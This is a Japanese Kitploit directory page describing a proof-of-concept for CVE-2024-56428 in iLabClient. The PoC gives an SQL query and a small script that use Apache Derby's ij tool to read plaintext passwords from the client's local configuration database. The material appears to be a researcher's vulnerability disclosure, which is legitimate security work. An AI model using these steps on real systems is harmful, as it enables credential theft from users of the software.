Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-56428 — iLabClientのローカルApache Derbyデータベースから平文の資格情報を読み取るCVE-2024-56428の概念実証エクスプロイト。 | Kitploit
ツール/GitHubGitHub/lisa-2905/cve-2024-56428
脆弱性分析エクスプロイトデータ流出情報収集
GitHublisa-2905/cve-2024-56428

CVE-2024-56428

iLabClientのローカルApache Derbyデータベースから平文の資格情報を読み取るCVE-2024-56428の概念実証エクスプロイト。

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-56428

iLabClient のローカルデータベース内の平文資格情報


設定(パスワードを含む)を読み出す

iLabClient は、ラボサーバーから結果をダウンロードするために使用されます。設定データは、Apache Derby インスタンス iLabClient にローカルに保存されます。パスワードは平文で保存されます。これを読み取るには、まずローカルデータベースへの接続を確立する必要があります。例えば、CVE-2024-56429 に記載されている方法を使用します。

パスワードを読み出します:

root@kitploit:~
select EINSTELLUNGEN from configs;

自動スクリプト

設定データを読み出すには、get_configs.sh スクリプトを実行できます。実行中は、他のプログラム(例: iLabClient 自体)がデータベースにアクセスしないことが重要です。

スクリプトの説明:

root@kitploit:~
#! /bin/bash
"C:\ilabClient\java8u422\bin\java.exe" -jar ".\derby-lib\derbyrun.jar" ij script_sql.sql
read

"C:\ilabClient\java8u422\bin\java.exe": クライアントのインストールに付属する Java バージョンを使用します。クライアントが別のディレクトリにインストールされている場合は、これを変更してください。
-jar: JAR ファイルを実行するための命令 Apache Derby の ツールの実行 : 対応する設定を読み出すスクリプト。クライアントが別のディレクトリにインストールされている場合は、このファイル内のデータベースへのパスを変更してください。


".\derby-lib\derbyrun.jar ij"
ij

script_sql.sql


発見者: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)

ツールをダウンロード